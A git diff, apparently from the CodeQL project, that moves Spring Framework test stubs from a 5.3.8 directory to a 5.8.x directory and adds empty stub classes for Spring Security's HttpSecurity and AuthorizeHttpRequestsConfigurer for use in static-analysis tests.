a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/ResponseEntity.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/ResponseEntity.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/ResponseEntity.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/ResponseEntity.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/client/ClientHttpResponse.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/client/ClientHttpResponse.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/client/ClientHttpResponse.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/client/ClientHttpResponse.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/server/PathContainer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/server/PathContainer.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/server/PathContainer.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/server/PathContainer.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/server/RequestPath.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/server/RequestPath.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/server/RequestPath.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/server/RequestPath.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/BatchPreparedStatementSetter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/BatchPreparedStatementSetter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/BatchPreparedStatementSetter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/BatchPreparedStatementSetter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/CallableStatementCallback.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/CallableStatementCallback.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/CallableStatementCallback.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/CallableStatementCallback.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/CallableStatementCreator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/CallableStatementCreator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/CallableStatementCreator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/CallableStatementCreator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ConnectionCallback.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ConnectionCallback.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ConnectionCallback.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ConnectionCallback.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/JdbcOperations.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/JdbcOperations.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/JdbcOperations.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/JdbcOperations.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/JdbcTemplate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/JdbcTemplate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/JdbcTemplate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/JdbcTemplate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ParameterizedPreparedStatementSetter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ParameterizedPreparedStatementSetter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ParameterizedPreparedStatementSetter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ParameterizedPreparedStatementSetter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/PreparedStatementCallback.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/PreparedStatementCallback.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/PreparedStatementCallback.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/PreparedStatementCallback.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/PreparedStatementCreator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/PreparedStatementCreator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/PreparedStatementCreator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/PreparedStatementCreator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/PreparedStatementSetter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/PreparedStatementSetter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/PreparedStatementSetter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/PreparedStatementSetter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ResultSetExtractor.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ResultSetExtractor.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ResultSetExtractor.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ResultSetExtractor.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ResultSetSupportingSqlParameter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ResultSetSupportingSqlParameter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/ResultSetSupportingSqlParameter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/ResultSetSupportingSqlParameter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/RowCallbackHandler.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/RowCallbackHandler.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/RowCallbackHandler.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/RowCallbackHandler.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/RowMapper.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/RowMapper.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/RowMapper.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/RowMapper.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/SqlParameter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/SqlParameter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/SqlParameter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/SqlParameter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/StatementCallback.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/StatementCallback.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/StatementCallback.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/StatementCallback.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/NamedParameterJdbcOperations.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/NamedParameterJdbcOperations.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/NamedParameterJdbcOperations.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/NamedParameterJdbcOperations.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/NamedParameterJdbcTemplate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/NamedParameterJdbcTemplate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/NamedParameterJdbcTemplate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/NamedParameterJdbcTemplate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/ParsedSql.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/ParsedSql.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/ParsedSql.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/ParsedSql.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/SqlParameterSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/SqlParameterSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/core/namedparam/SqlParameterSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/core/namedparam/SqlParameterSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/BatchSqlUpdate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/BatchSqlUpdate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/BatchSqlUpdate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/BatchSqlUpdate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/MappingSqlQuery.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/MappingSqlQuery.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/MappingSqlQuery.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/MappingSqlQuery.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/MappingSqlQueryWithParameters.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/MappingSqlQueryWithParameters.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/MappingSqlQueryWithParameters.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/MappingSqlQueryWithParameters.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/RdbmsOperation.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/RdbmsOperation.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/RdbmsOperation.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/RdbmsOperation.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlFunction.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlFunction.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlFunction.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlFunction.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlOperation.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlOperation.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlOperation.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlOperation.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlQuery.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlQuery.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlQuery.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlQuery.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlUpdate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlUpdate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/SqlUpdate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/SqlUpdate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/UpdatableSqlQuery.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/UpdatableSqlQuery.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/object/UpdatableSqlQuery.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/object/UpdatableSqlQuery.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/JdbcAccessor.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/JdbcAccessor.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/JdbcAccessor.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/JdbcAccessor.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/KeyHolder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/KeyHolder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/KeyHolder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/KeyHolder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/SQLExceptionTranslator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/SQLExceptionTranslator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/SQLExceptionTranslator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/SQLExceptionTranslator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/rowset/SqlRowSet.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/rowset/SqlRowSet.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/rowset/SqlRowSet.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/rowset/SqlRowSet.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/rowset/SqlRowSetMetaData.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/rowset/SqlRowSetMetaData.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jdbc/support/rowset/SqlRowSetMetaData.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jdbc/support/rowset/SqlRowSetMetaData.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jndi/JndiCallback.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jndi/JndiCallback.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jndi/JndiCallback.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jndi/JndiCallback.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/jndi/JndiTemplate.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/jndi/JndiTemplate.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/jndi/JndiTemplate.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/jndi/JndiTemplate.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/lang/Nullable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/lang/Nullable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/lang/Nullable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/lang/Nullable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/caucho/HessianExporter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/caucho/HessianExporter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/caucho/HessianExporter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/caucho/HessianExporter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/caucho/HessianServiceExporter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/caucho/HessianServiceExporter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/caucho/HessianServiceExporter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/caucho/HessianServiceExporter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/rmi/RemoteInvocationSerializingExporter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/rmi/RemoteInvocationSerializingExporter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/rmi/RemoteInvocationSerializingExporter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/rmi/RemoteInvocationSerializingExporter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/rmi/RmiBasedExporter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/rmi/RmiBasedExporter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/rmi/RmiBasedExporter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/rmi/RmiBasedExporter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/rmi/RmiServiceExporter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/rmi/RmiServiceExporter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/remoting/rmi/RmiServiceExporter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/remoting/rmi/RmiServiceExporter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/ScriptEvaluator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/ScriptEvaluator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/ScriptEvaluator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/ScriptEvaluator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/ScriptSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/ScriptSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/ScriptSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/ScriptSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/bsh/BshScriptEvaluator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/bsh/BshScriptEvaluator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/bsh/BshScriptEvaluator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/bsh/BshScriptEvaluator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/support/StaticScriptSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/support/StaticScriptSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/scripting/support/StaticScriptSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/scripting/support/StaticScriptSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/Customizer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/Customizer.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/Customizer.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/Customizer.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/AbstractConfiguredSecurityBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/AbstractConfiguredSecurityBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/AbstractConfiguredSecurityBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/AbstractConfiguredSecurityBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/AbstractSecurityBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/AbstractSecurityBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/AbstractSecurityBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/AbstractSecurityBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/SecurityBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/SecurityBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/SecurityBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/SecurityBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/SecurityConfigurer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/SecurityConfigurer.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/SecurityConfigurer.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/SecurityConfigurer.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/SecurityConfigurerAdapter.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/SecurityConfigurerAdapter.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/SecurityConfigurerAdapter.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/SecurityConfigurerAdapter.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/AbstractRequestMatcherRegistry.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/AbstractRequestMatcherRegistry.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/AbstractRequestMatcherRegistry.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/AbstractRequestMatcherRegistry.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/HttpSecurityBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/HttpSecurityBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/HttpSecurityBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/HttpSecurityBuilder.java diff --git a/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/builders/HttpSecurity.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/builders/HttpSecurity.java new file mode 100644 index 000000000000..f900fc74d2fd --- /dev/null +++ b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/builders/HttpSecurity.java @@ -0,0 +1,81 @@ +package org.springframework.security.config.annotation.web.builders; + +import org.springframework.security.config.annotation.AbstractConfiguredSecurityBuilder; +import org.springframework.security.config.annotation.SecurityBuilder; +import org.springframework.security.config.annotation.web.HttpSecurityBuilder; +import org.springframework.security.config.annotation.web.builders.HttpSecurity.RequestMatcherConfigurer; +import org.springframework.security.web.DefaultSecurityFilterChain; +import org.springframework.security.web.util.matcher.RequestMatcher; +import org.springframework.security.config.Customizer; +import org.springframework.security.config.annotation.web.configurers.CsrfConfigurer; +import org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer; +import org.springframework.security.config.annotation.web.configurers.AuthorizeHttpRequestsConfigurer; +import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry; + +public final class HttpSecurity extends AbstractConfiguredSecurityBuilder + implements SecurityBuilder, HttpSecurityBuilder { + + public HttpSecurity requestMatcher(RequestMatcher requestMatcher) { + return this; + } + + public HttpSecurity securityMatcher(RequestMatcher requestMatcher) { + return this; + } + + public HttpSecurity securityMatcher(String... patterns) { + return this; + } + + public HttpSecurity authorizeRequests( + Customizer.ExpressionInterceptUrlRegistry> authorizeRequestsCustomizer) + throws Exception { + return this; + } + + public ExpressionUrlAuthorizationConfigurer.ExpressionInterceptUrlRegistry authorizeRequests() + throws Exception { + return null; + } + + public HttpSecurity authorizeHttpRequests( + Customizer.AuthorizationManagerRequestMatcherRegistry> authorizeHttpRequestsCustomizer) + throws Exception { + return this; + } + + public AuthorizeHttpRequestsConfigurer.AuthorizationManagerRequestMatcherRegistry authorizeHttpRequests() + throws Exception { + return null; + } + + public HttpSecurity requestMatchers(Customizer requestMatcherCustomizer) { + return this; + } + + public RequestMatcherConfigurer requestMatchers() { + return null; + } + + public HttpSecurity securityMatchers(Customizer requestMatcherCustomizer) { + return this; + } + + public RequestMatcherConfigurer securityMatchers() { + return null; + } + + public CsrfConfigurer csrf() { + return null; + } + + public HttpSecurity csrf(Customizer> csrfCustomizer) { + return null; + } + + public final class MvcMatchersRequestMatcherConfigurer extends RequestMatcherConfigurer { + } + + public class RequestMatcherConfigurer extends AbstractRequestMatcherRegistry { + } +} diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AbstractConfigAttributeRequestMatcherRegistry.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AbstractConfigAttributeRequestMatcherRegistry.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AbstractConfigAttributeRequestMatcherRegistry.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AbstractConfigAttributeRequestMatcherRegistry.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AbstractHttpConfigurer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AbstractHttpConfigurer.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AbstractHttpConfigurer.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AbstractHttpConfigurer.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AbstractInterceptUrlConfigurer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AbstractInterceptUrlConfigurer.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AbstractInterceptUrlConfigurer.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AbstractInterceptUrlConfigurer.java diff --git a/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java new file mode 100644 index 000000000000..ff54fc7e3d11 --- /dev/null +++ b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java @@ -0,0 +1,22 @@ +package org.springframework.security.config.annotation.web.configurers; + +import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry; +import org.springframework.security.config.annotation.web.HttpSecurityBuilder; + +public final class AuthorizeHttpRequestsConfigurer> + extends AbstractHttpConfigurer, H> { + + public final class AuthorizationManagerRequestMatcherRegistry extends + AbstractRequestMatcherRegistry { + } + + public class AuthorizedUrl { + public AuthorizationManagerRequestMatcherRegistry permitAll() { + return null; + } + + public AuthorizationManagerRequestMatcherRegistry hasRole(String role) { + return null; + } + } +} diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/CsrfConfigurer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/CsrfConfigurer.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/CsrfConfigurer.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/CsrfConfigurer.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java similarity index 88% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java rename to 